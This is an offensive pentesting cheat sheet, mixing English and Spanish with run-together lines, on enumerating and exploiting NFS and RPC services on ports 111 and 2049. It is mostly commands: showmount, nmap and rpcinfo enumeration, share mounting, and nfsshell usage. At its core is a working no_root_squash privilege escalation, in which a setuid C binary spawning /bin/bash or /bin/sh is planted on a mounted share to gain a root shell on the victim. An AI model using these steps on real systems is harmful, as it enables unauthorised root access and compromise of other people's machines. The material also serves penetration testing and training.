πPort 111-2049 (RPC/NFS)
Network file sharing(nfs)
Show Mountable NFS Shares
showmount -e <IP>
nmap --script=nfs-showmount -oN mountable_shares <IP>Mount a share
sudo mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
sudo mount -v -t nfs -o vers=2 <IP>:<SHARE> <DIRECTORY>NFS misconfigurations
# List exported shares
cat /etc/exportsIf you find some directory that is configured as no_root_squash/no_all_squash you may be able to privesc.
# Attacker, as root user
mkdir <DIRECTORY>
mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
cd <DIRECTORY>
echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0;}' > pwn.c
gcc pwn.c -o pwn
chmod +s pwn
# Victim
cd <SHARE>
./pwn # Root shellscan
showmount -e someexample.comrpcinfo 111
installation
apt-get install rpcbind
apt-get install nfs-commonrpcinfo -p IP_Addressrpcdump
by impacket
rpcdump.py 10.10.xx.xxnmap
nmap -Pn -sV -script=nfs*mount the nfs
mount -o nolock <ip>:/path_remote /path/local$ mkdir backup
$ mount -o ro,noexec someexample.com:/backup backup
$ ls backup
backup.tar.bz2.zip$ mount -t nfs someexample.com:/backup backupvulnerabilidad
chequear β/etc/exportsβ si tiene no_root_squash o no_all_squash y tenemos permisos de escritura se puede crear un ejecutable con setuid ej:
int main(void) {
setgid(0); setuid(0);
execl(β/bin/shβ,βshβ,0); }chown root.root ./pwnme
chmod u+s ./pwnmenfshell
install https://github.com/NetDirect/nfsshell
root@kali:~/Downloads/nfsshell-master# apt-get install libreadline-dev libncurses5-dev root@kali:~/Downloads/nfsshell-master# makeuse
root@kali:~# nfsshell nfs> host 10.10.10.34 nfs> export nfs> mount /loquefuere
Last updated